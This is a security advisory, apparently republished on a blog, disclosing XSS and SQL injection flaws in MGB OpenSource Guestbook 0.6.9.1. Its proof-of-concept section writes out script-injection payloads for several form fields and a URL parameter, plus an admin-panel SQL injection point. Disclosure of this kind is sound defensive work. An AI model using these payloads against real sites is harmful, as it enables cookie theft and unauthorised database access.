MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities | BOT24

MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities


Advisory:
MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities
Advisory ID:
SSCHADV2012-017
Author:
Stefan Schurtz
Affected Software:
Successfully tested on MGB OpenSource Guestbook 0.6.9.1
Vendor URL:
Vendor Status:
informed
======================
Vulnerability Description
======================
The MGB OpenSource Guestbook is prone to multiple security vulnerabilities

==============
PoC-Exploit
==============

// XSS

  1. GET
http://[target]/mgb/index.php?p=1‘"</script><script>alert(document.cookie)</script>

  1. POST
http://[target]/mgb/newentry.php
sent=1&name=‘"</style></script><script>alert(/xss/)</script>&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message
=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=‘"</style></script><script>alert(/xss/)</script>&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=
&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=‘"</style></script><script>alert(/xss/)</script>&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification
=1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=‘"</style></script><script>alert(/xss/)</script>&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=
1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=‘"</style></script><script>alert(/xss/)</script>&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=
1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=‘"</style></script><script>alert(/xss/)</script>&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=
1&user_show_email=1&preview=Vorschau
sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp=
‘"</style></script><script>alert(/xss/)</script>&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=
Vorschau

// SQLi (Admin backend)

http://
[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1

=====
Solution
=====

– 

================
Disclosure Timeline
================

05-Jul-2012 – developer informed
07-Jul-2012 – feedback from developer

====
Credits
====

Vulnerabilities found and advisory written by Stefan Schurtz.

=======
References
=======

http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt




Disclaimer: The content provided herein is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an “ASIS” condition.In addition one should always verify any vulnerability with the specific 
vendor talked about in any of the vulnerabilities/advisories described in these writings. There 
are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any  direct, indirect, or consequential loss or damage arising from use of, or 
reliance on, this information
Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment